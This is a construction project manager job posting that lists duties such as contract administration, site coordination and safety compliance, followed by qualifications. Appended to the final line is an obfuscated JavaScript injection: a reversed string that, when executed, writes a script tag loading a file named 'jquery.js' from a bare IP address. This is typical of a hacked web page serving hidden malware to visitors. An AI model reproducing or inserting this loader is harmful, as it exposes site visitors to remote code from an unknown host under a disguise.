Industry : Construction
• Contract management, responsible to manage, coordinate and control pre and post project contract administration in ensuring project progress as schedule and within budget.
• Lead a construction team in the objective to complete the work in time with minimize wastage and within budgeted cost.
• Coordinate with clients, consultants, main and sub-contractors and suppliers on all project implementation issues.
• Attend site meeting and carry out site evaluation and measurements.
• To manage correspondences with clients, consultants and other related parties.
• Ensure the projects are adhered to the individual site’s safety, health and environment policies and specifications at all times.
• To adhere to authority requirements.
• Responsible for the overall successful completion and delivery to clients in accordance to the contractual delivery time and specifications.
• Weekly reporting to the management on the status of the progress of works.
• Perform other related duties incidental to the work described herein.
• Perform any ad-hoc tasks assigned.
• Degree in Civil Engineering, Construction/Building Management or related to construction industry.
• Minimum 8 years relevant construction working experience.
• Strong leadership, tactful, self-assured, independent, a team player and able to work in a fast pace environment.
• Willing to work long hours when required by site works and have a high sense of responsibility.
• Computer literate, high integrity and exhibit strong arithmetical and negotiation skills.
• Strong interpersonal skills with effective communication, both verbal and written. Mandarin is an added advantage. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))